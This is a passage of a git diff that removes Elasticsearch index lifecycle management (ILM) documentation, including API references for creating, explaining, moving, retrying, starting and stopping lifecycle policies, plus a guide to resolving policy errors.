until is it safe to convert a follower index into a regular index. -The following conditions must be met: - -* The leader index must have `index.lifecycle.indexing_complete` set to `true`. -This happens automatically if the leader index is rolled over using the -<> action, and can be set manually using -the <> API. -* All operations performed on the leader index have been replicated to the follower index. -This ensures that no operations are lost when the index is converted. - -Once these conditions are met, unfollow performs the following operations: - -* Pauses indexing following for the follower index. -* Closes the follower index. -* Unfollows the leader index. -* Opens the follower index (which is at this point is a regular index). - -[[ilm-unfollow-options]] -==== Options - -None. - -[[ilm-unfollow-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "unfollow" : {} - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc b/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc deleted file mode 100644 index 5a953417a64..00000000000 --- a/docs/reference/ilm/actions/ilm-wait-for-snapshot.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[role="xpack"] -[[ilm-wait-for-snapshot]] -=== Wait for snapshot - -Phases allowed: delete. - -Waits for the specified {slm-init} policy to be executed before removing the index. -This ensures that a snapshot of the deleted index is available. - -[[ilm-wait-for-snapshot-options]] -==== Options - -`policy`:: -(Required, string) -Name of the {slm-init} policy that the delete action should wait for. - -[[ilm-wait-for-snapshot-ex]] -==== Example - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "delete": { - "actions": { - "wait_for_snapshot" : { - "policy": "slm-policy-name" - } - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/ilm/apis/delete-lifecycle.asciidoc b/docs/reference/ilm/apis/delete-lifecycle.asciidoc deleted file mode 100644 index 51af2b30791..00000000000 --- a/docs/reference/ilm/apis/delete-lifecycle.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-delete-lifecycle]] -=== Delete lifecycle policy API -++++ -Delete policy -++++ - -Deletes an index lifecycle policy. - -[[ilm-delete-lifecycle-request]] -==== {api-request-title} - -`DELETE _ilm/policy/` - -[[ilm-delete-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-delete-lifecycle-desc]] -==== {api-description-title} - -Deletes the specified lifecycle policy definition. You cannot delete policies -that are currently in use. If the policy is being used to manage any indices, -the request fails and returns an error. - -[[ilm-delete-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the policy. - -[[ilm-delete-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-delete-lifecycle-example]] -==== {api-examples-title} - -The following example deletes `my_policy`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _ilm/policy/my_policy --------------------------------------------------- -// TEST[continued] - -When the policy is successfully deleted, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/explain.asciidoc b/docs/reference/ilm/apis/explain.asciidoc deleted file mode 100644 index 003d10af6c0..00000000000 --- a/docs/reference/ilm/apis/explain.asciidoc +++ /dev/null @@ -1,314 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-explain-lifecycle]] -=== Explain lifecycle API -++++ -Explain lifecycle -++++ - -Retrieves the current lifecycle status for one or more indices. For data -streams, the API retrieves the current lifecycle status for the stream's backing -indices. - -[[ilm-explain-lifecycle-request]] -==== {api-request-title} - -`GET /_ilm/explain` - -[[ilm-explain-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`view_index_metadata` or `manage_ilm` or both privileges on the indices being -managed to use this API. For more information, see <>. - -[[ilm-explain-lifecycle-desc]] -==== {api-description-title} - -Retrieves information about the index's current lifecycle state, such as -the currently executing phase, action, and step. Shows when the index entered -each one, the definition of the running phase, and information -about any failures. - -[[ilm-explain-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases to target. -Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - -[[ilm-explain-lifecycle-query-params]] -==== {api-query-parms-title} - -`only_managed`:: - (Optional, Boolean) Filters the returned indices to only indices that are managed by - {ilm-init}. - -`only_errors`:: - (Optional, Boolean) Filters the returned indices to only indices that are managed by - {ilm-init} and are in an error state, either due to an encountering an error while - executing the policy, or attempting to use a policy that does not exist. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-explain-lifecycle-example]] -==== {api-examples-title} - -The following example retrieves the lifecycle state of `my-index-000001`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy", - "index.number_of_replicas": 0 - } -} - -GET /_cluster/health?wait_for_status=green&timeout=10s --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -GET my-index-000001/_ilm/explain --------------------------------------------------- -// TEST[continued] - -When management of the index is first taken over by {ilm-init}, `explain` shows -that the index is managed and in the `new` phase: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-000001": { - "index": "my-index-000001", - "managed": true, <1> - "policy": "my_policy", <2> - "lifecycle_date_millis": 1538475653281, <3> - "age": "15s", <4> - "phase": "new", - "phase_time_millis": 1538475653317, <5> - "action": "complete", - "action_time_millis": 1538475653317, <6> - "step": "complete", - "step_time_millis": 1538475653317 <7> - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> Shows if the index is being managed by {ilm-init}. If the index is not managed by -{ilm-init} the other fields will not be shown -<2> The name of the policy which {ilm-init} is using for this index -<3> The timestamp used for the `min_age` -<4> The age of the index (used for calculating when to enter the next phase) -<5> When the index entered the current phase -<6> When the index entered the current action -<7> When the index entered the current step - -Once the policy is running on the index, the response includes a -`phase_execution` object that shows the definition of the current phase. -Changes to the underlying policy will not affect this index until the current -phase completes. - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000069": { - "index": "test-000069", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "25.14s", - "phase": "hot", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "rollover", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "attempt-rollover", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { <1> - "min_age": "0ms", - "actions": { - "rollover": { - "max_age": "30s" - } - } - }, - "version": 3, <2> - "modified_date": "2018-10-15T13:21:41.576Z", <3> - "modified_date_in_millis": 1539609701576 <4> - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> The JSON phase definition loaded from the specified policy when the index -entered this phase -<2> The version of the policy that was loaded -<3> The date the loaded policy was last modified -<4> The epoch time when the loaded policy was last modified - -If {ilm-init} is waiting for a step to complete, the response includes status -information for the step that's being performed on the index. - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000020": { - "index": "test-000020", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "4.12m", - "phase": "warm", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "allocate", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "check-allocation", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "step_info": { <1> - "message": "Waiting for all shard copies to be active", - "shards_left_to_allocate": -1, - "all_shards_active": false, - "number_of_replicas": 2 - }, - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { - "min_age": "0ms", - "actions": { - "allocate": { - "number_of_replicas": 2, - "include": { - "box_type": "warm" - }, - "exclude": {}, - "require": {} - }, - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "version": 2, - "modified_date": "2018-10-15T13:20:02.489Z", - "modified_date_in_millis": 1539609602489 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> Status of the step that's in progress. - -If the index is in the ERROR step, something went wrong while executing a -step in the policy and you will need to take action for the index to proceed -to the next step. Some steps are safe to automatically be retried in certain -circumstances. To help you diagnose the problem, the explain response shows -the step that failed, the step info which provides information about the error, -and information about the retry attempts executed for the failed step if it's -the case. - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "test-000056": { - "index": "test-000056", - "managed": true, - "policy": "my_lifecycle3", - "lifecycle_date_millis": 1538475653281, - "lifecycle_date": "2018-10-15T13:45:21.981Z", - "age": "50.1d", - "phase": "hot", - "phase_time_millis": 1538475653317, - "phase_time": "2018-10-15T13:45:22.577Z", - "action": "rollover", - "action_time_millis": 1538475653317, - "action_time": "2018-10-15T13:45:22.577Z", - "step": "ERROR", - "step_time_millis": 1538475653317, - "step_time": "2018-10-15T13:45:22.577Z", - "failed_step": "check-rollover-ready", <1> - "is_auto_retryable_error": true, <2> - "failed_step_retry_count": 1, <3> - "step_info": { <4> - "type": "cluster_block_exception", - "reason": "index [test-000057/H7lF9n36Rzqa-KfKcnGQMg] blocked by: [FORBIDDEN/5/index read-only (api)", - "index_uuid": "H7lF9n36Rzqa-KfKcnGQMg", - "index": "test-000057" - }, - "phase_execution": { - "policy": "my_lifecycle3", - "phase_definition": { - "min_age": "0ms", - "actions": { - "rollover": { - "max_age": "30s" - } - } - }, - "version": 3, - "modified_date": "2018-10-15T13:21:41.576Z", - "modified_date_in_millis": 1539609701576 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:not possible to get the cluster into this state in a docs test] - -<1> The step that caused the error -<2> Indicates if retrying the failed step can overcome the error. If this -is true, {ilm-init} will retry the failed step automatically. -<3> Shows the number of attempted automatic retries to execute the failed -step. -<4> What went wrong diff --git a/docs/reference/ilm/apis/get-lifecycle.asciidoc b/docs/reference/ilm/apis/get-lifecycle.asciidoc deleted file mode 100644 index 005dad56fc5..00000000000 --- a/docs/reference/ilm/apis/get-lifecycle.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-get-lifecycle]] -=== Get lifecycle policy API -++++ -Get policy -++++ - -Retrieves a lifecycle policy. - -[[ilm-get-lifecycle-request]] -==== {api-request-title} - -`GET _ilm/policy` - -`GET _ilm/policy/` - -[[ilm-get-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` or -`read_ilm` or both cluster privileges to use this API. For more information, see -<>. - -[[ilm-get-lifecycle-desc]] -==== {api-description-title} - -Returns the specified policy definition. Includes the policy version and last -modified date. If no policy is specified, returns all defined policies. - -[[ilm-get-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Identifier for the policy. - -[[ilm-get-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-get-lifecycle-example]] -==== {api-examples-title} - -The following example retrieves `my_policy`: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _ilm/policy/my_policy --------------------------------------------------- -// TEST[continued] - - -If the request succeeds, the body of the response contains the policy definition: - -[source,console-result] --------------------------------------------------- -{ - "my_policy": { - "version": 1, <1> - "modified_date": 82392349, <2> - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": { - "delete_searchable_snapshot": true - } - } - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"modified_date": 82392349/"modified_date": $body.my_policy.modified_date/] - -<1> The policy version is incremented whenever the policy is updated -<2> When this policy was last modified diff --git a/docs/reference/ilm/apis/get-status.asciidoc b/docs/reference/ilm/apis/get-status.asciidoc deleted file mode 100644 index ac3d1b06610..00000000000 --- a/docs/reference/ilm/apis/get-status.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-get-status]] -=== Get {ilm} status API - -[subs="attributes"] -++++ -Get {ilm} status -++++ - -Retrieves the current {ilm} ({ilm-init}) status. - -[[ilm-get-status-request]] -==== {api-request-title} - -`GET /_ilm/status` - -[[ilm-get-status-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` or -`read_ilm` or both cluster privileges to use this API. For more information, see -<>. - -[[ilm-get-status-desc]] -==== {api-description-title} - -[[ilm-operating-modes]] -Returns the status of the {ilm-init} plugin. -The `operation_mode` in the response shows one of three states: `STARTED`, `STOPPING`, or `STOPPED`. -You can start or stop {ilm-init} with the -<> and <> APIs. - -[[ilm-get-status-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-get-status-example]] -==== {api-examples-title} - -The following example gets the {ilm-init} plugin status. - -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- - -If the request succeeds, the body of the response shows the operation mode: - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "RUNNING" -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/ilm-api.asciidoc b/docs/reference/ilm/apis/ilm-api.asciidoc deleted file mode 100644 index 97a00e2c3fa..00000000000 --- a/docs/reference/ilm/apis/ilm-api.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[index-lifecycle-management-api]] -== {ilm-cap} APIs - -You use the following APIs to set up policies to automatically manage the index lifecycle. -For more information about {ilm} ({ilm-init}), see <>. - -[discrete] -[[ilm-api-policy-endpoint]] -=== Policy management APIs - -* <> -* <> -* <> - -[discrete] -[[ilm-api-index-endpoint]] -=== Index management APIs - -* <> -* <> -* <> - -[discrete] -[[ilm-api-management-endpoint]] -=== Operation management APIs - -* <> -* <> -* <> -* <> - - -include::put-lifecycle.asciidoc[] -include::get-lifecycle.asciidoc[] -include::delete-lifecycle.asciidoc[] - -include::move-to-step.asciidoc[] -include::remove-policy-from-index.asciidoc[] -include::retry-policy.asciidoc[] - -include::get-status.asciidoc[] -include::explain.asciidoc[] -include::start.asciidoc[] -include::stop.asciidoc[] diff --git a/docs/reference/ilm/apis/move-to-step.asciidoc b/docs/reference/ilm/apis/move-to-step.asciidoc deleted file mode 100644 index 575a405b697..00000000000 --- a/docs/reference/ilm/apis/move-to-step.asciidoc +++ /dev/null @@ -1,174 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-move-to-step]] -=== Move to lifecycle step API -++++ -Move to step -++++ - -Triggers execution of a specific step in the lifecycle policy. - -[[ilm-move-to-step-request]] -==== {api-request-title} - -`POST _ilm/move/` - -[[ilm-move-to-step-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-move-to-step-desc]] -==== {api-description-title} - -WARNING: This operation can result in the loss of data. Manually moving an index -into a specific step executes that step even if it has already been performed. -This is a potentially destructive action and this should be considered an expert -level API. - -Manually moves an index into the specified step and executes that step. -You must specify both the current step and the step to be executed in the -body of the request. - -The request will fail if the current step does not match the step currently -being executed for the index. This is to prevent the index from being moved from -an unexpected step into the next step. - -[[ilm-move-to-step-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the index. - -[[ilm-move-to-step-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[role="child_attributes"] -[[ilm-move-to-step-request-body]] -==== {api-request-body-title} - -`current_step`:: -(Required, object) -+ -.Properties of `current_step` -[%collapsible%open] -==== -`phase`:: -(Required, string) -The name of the current phase. -Must match the phase as returned by the <> API. - -`action`:: -(Required, string) -The name of the current action. -Must match the action as returned by the <> API. - -`name`:: -(Required, string) -The name of the current step. -Must match the step as returned by the <> API. -If {ilm-init} encounters a problem while performing an action, -it halts execution of the policy and transitions to the `ERROR` step. -If you are trying to advance a policy after troubleshooting a failure, -you specify this `ERROR` step as the current step. -For more information, see <>. - -==== - -`next_step`:: -(Required, object) -+ -.Properties of `next_step` -[%collapsible%open] -==== -`phase`:: -(Required, string) -The name of the phase that contains the action you want to perform or resume. - -`action`:: -(Required, string) -The name action you want to perform or resume. - -`name`:: -(Required, string) -The name of the step to move to and execute. - -==== - -[[ilm-move-to-step-example]] -==== {api-examples-title} - -The following example moves `my-index-000001` from the initial step to the -`forcemerge` step: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/move/my-index-000001 -{ - "current_step": { <1> - "phase": "new", - "action": "complete", - "name": "complete" - }, - "next_step": { <2> - "phase": "warm", - "action": "forcemerge", - "name": "forcemerge" - } -} --------------------------------------------------- -// TEST[continued] -<1> The step that the index is expected to be in -<2> The step that you want to execute - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -The request will fail if the index is not in the `new` phase as specified -by the `current_step`. diff --git a/docs/reference/ilm/apis/put-lifecycle.asciidoc b/docs/reference/ilm/apis/put-lifecycle.asciidoc deleted file mode 100644 index f5361820437..00000000000 --- a/docs/reference/ilm/apis/put-lifecycle.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-put-lifecycle]] -=== Create lifecycle policy API -++++ -Create policy -++++ - -Creates or updates lifecycle policy. See <> for -definitions of policy components. - -[[ilm-put-lifecycle-request]] -==== {api-request-title} - -`PUT _ilm/policy/` - -[[ilm-put-lifecycle-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. You must also have the `manage` index -privilege on all indices being managed by `policy`. {ilm-init} performs -operations as the user who last updated the policy. {ilm-init} only has the -<> assigned to the user at the time of the last policy -update. - -[[ilm-put-lifecycle-desc]] -==== {api-description-title} - -Creates a lifecycle policy. If the specified policy exists, the policy is -replaced and the policy version is incremented. - -NOTE: Only the latest version of the policy is stored, you cannot revert to -previous versions. - -[[ilm-put-lifecycle-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the policy. - -[[ilm-put-lifecycle-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-put-lifecycle-example]] -==== {api-examples-title} - -The following example creates a new policy named `my_policy`: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} --------------------------------------------------- - -If the request succeeds, you receive the following result: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ilm/apis/remove-policy-from-index.asciidoc b/docs/reference/ilm/apis/remove-policy-from-index.asciidoc deleted file mode 100644 index 1826dc1e6f5..00000000000 --- a/docs/reference/ilm/apis/remove-policy-from-index.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-remove-policy]] -=== Remove policy from index API -++++ -Remove policy -++++ - -Removes assigned lifecycle policies from an index or a data stream's backing -indices. - -[[ilm-remove-policy-request]] -==== {api-request-title} - -`POST /_ilm/remove` - -[[ilm-remove-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-remove-policy-desc]] -==== {api-description-title} - -For indices, the remove lifecycle policy API removes the assigned lifecycle -policy and stops managing the specified index. - -For data streams, the API removes any assigned lifecycle policies from -the stream's backing indices and stops managing the indices. - -[[ilm-remove-policy-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, and index aliases to target. -Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, use `_all` or `*`. - -[[ilm-remove-policy-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-remove-policy-example]] -==== {api-examples-title} - -The following example removes the assigned policy from `my-index-000001`. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST my-index-000001/_ilm/remove --------------------------------------------------- -// TEST[continued] - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "has_failures" : false, - "failed_indexes" : [] -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/retry-policy.asciidoc b/docs/reference/ilm/apis/retry-policy.asciidoc deleted file mode 100644 index a8d057ba114..00000000000 --- a/docs/reference/ilm/apis/retry-policy.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-retry-policy]] -=== Retry policy execution API -++++ -Retry policy -++++ - -Retry executing the policy for an index that is in the ERROR step. - -[[ilm-retry-policy-request]] -==== {api-request-title} - -`POST /_ilm/retry` - -[[ilm-retry-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -privileges on the indices being managed to use this API. For more information, -see <>. - -[[ilm-retry-policy-desc]] -==== {api-description-title} - -Sets the policy back to the step where the error occurred and executes the step. -Use the <> to determine if an index is in the ERROR -step. - -[[ilm-retry-policy-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the indices to retry in comma-separated format. - -[[ilm-retry-policy-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-retry-policy-example]] -==== {api-examples-title} - -The following example retries the policy for `my-index-000001`. - -[source,js] --------------------------------------------------- -POST my-index-000001/_ilm/retry --------------------------------------------------- -// NOTCONSOLE - -If the request succeeds, you receive the following result: - -[source,js] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ilm/apis/start.asciidoc b/docs/reference/ilm/apis/start.asciidoc deleted file mode 100644 index 5c79839a415..00000000000 --- a/docs/reference/ilm/apis/start.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-start]] -=== Start {ilm} API - -[subs="attributes"] -++++ -Start {ilm} -++++ - -Start the {ilm} ({ilm-init}) plugin. - -[[ilm-start-request]] -==== {api-request-title} - -`POST /_ilm/start` - -[[ilm-start-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-start-desc]] -==== {api-description-title} - -Starts the {ilm-init} plugin if it is currently stopped. {ilm-init} is started -automatically when the cluster is formed. Restarting {ilm-init} is only -necessary if it has been stopped using the <>. - -[[ilm-start-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-start-example]] -==== {api-examples-title} - -The following example starts the {ilm-init} plugin. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 - -POST _ilm/stop --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - -If the request succeeds, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/ilm/apis/stop.asciidoc b/docs/reference/ilm/apis/stop.asciidoc deleted file mode 100644 index 5eb886437f6..00000000000 --- a/docs/reference/ilm/apis/stop.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-stop]] -=== Stop {ilm} API - -[subs="attributes"] -++++ -Stop {ilm} -++++ - -Stop the {ilm} ({ilm-init}) plugin. - -[[ilm-stop-request]] -==== {api-request-title} - -`POST /_ilm/stop` - -[[ilm-stop-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage_ilm` -cluster privilege to use this API. For more information, see -<>. - -[[ilm-stop-desc]] -==== {api-description-title} - -Halts all lifecycle management operations and stops the {ilm-init} plugin. This -is useful when you are performing maintenance on the cluster and need to prevent -{ilm-init} from performing any actions on your indices. - -The API returns as soon as the stop request has been acknowledged, but the -plugin might continue to run until in-progress operations complete and the plugin -can be safely stopped. Use the <> API to see -if {ilm-init} is running. - -[[ilm-stop-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[[ilm-stop-example]] -==== {api-examples-title} - -The following example stops the {ilm-init} plugin. - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/stop --------------------------------------------------- -// TEST[continued] - -If the request does not encounter errors, you receive the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/ilm/error-handling.asciidoc b/docs/reference/ilm/error-handling.asciidoc deleted file mode 100644 index 500ac99ec12..00000000000 --- a/docs/reference/ilm/error-handling.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-error-handling]] -== Resolve lifecycle policy execution errors - -When {ilm-init} executes a lifecycle policy, it's possible for errors to occur -while performing the necessary index operations for a step. -When this happens, {ilm-init} moves the index to an `ERROR` step. -If {ilm-init} cannot resolve the error automatically, execution is halted -until you resolve the underlying issues with the policy, index, or cluster. - -For example, you might have a `shrink-index` policy that shrinks an index to four shards once it -is at least five days old: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/shrink-index -{ - "policy": { - "phases": { - "warm": { - "min_age": "5d", - "actions": { - "shrink": { - "number_of_shards": 4 - } - } - } - } - } -} --------------------------------------------------- -// TEST - -There is nothing that prevents you from applying the `shrink-index` policy to a new -index that has only two shards: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "index.number_of_shards": 2, - "index.lifecycle.name": "shrink-index" - } -} --------------------------------------------------- -// TEST[continued] - -After five days, {ilm-init} attempts to shrink `my-index-000001` from two shards to four shards. -Because the shrink action cannot _increase_ the number of shards, this operation fails -and {ilm-init} moves `my-index-000001` to the `ERROR` step. - -You can use the <> to get information about -what went wrong: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_ilm/explain --------------------------------------------------- -// TEST[continued] - -Which returns the following information: - -[source,console-result] --------------------------------------------------- -{ - "indices" : { - "my-index-000001" : { - "index" : "my-index-000001", - "managed" : true, - "policy" : "shrink-index", <1> - "lifecycle_date_millis" : 1541717265865, - "age": "5.1d", <2> - "phase" : "warm", <3> - "phase_time_millis" : 1541717272601, - "action" : "shrink", <4> - "action_time_millis" : 1541717272601, - "step" : "ERROR", <5> - "step_time_millis" : 1541717272688, - "failed_step" : "shrink", <6> - "step_info" : { - "type" : "illegal_argument_exception", <7> - "reason" : "the number of target shards [4] must be less that the number of source shards [2]" - }, - "phase_execution" : { - "policy" : "shrink-index", - "phase_definition" : { <8> - "min_age" : "5d", - "actions" : { - "shrink" : { - "number_of_shards" : 4 - } 